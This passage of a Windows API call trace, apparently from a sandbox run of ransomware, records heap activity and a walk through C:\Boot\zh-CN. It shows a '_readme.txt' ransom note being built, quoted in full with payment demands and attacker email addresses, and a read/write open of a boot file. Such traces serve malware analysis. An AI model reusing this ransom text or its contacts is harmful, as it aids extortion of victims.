0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.671] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.671] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.671] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.671] PathFindFileNameW (pszPath="") returned="" [0201.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.671] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.672] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.672] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.672] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.672] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.672] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0201.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.672] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.672] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.672] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.673] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.673] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.673] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.673] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0201.673] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.673] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.673] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.673] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.673] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.676] HeapFree (in: hHeap=0x2c0000, 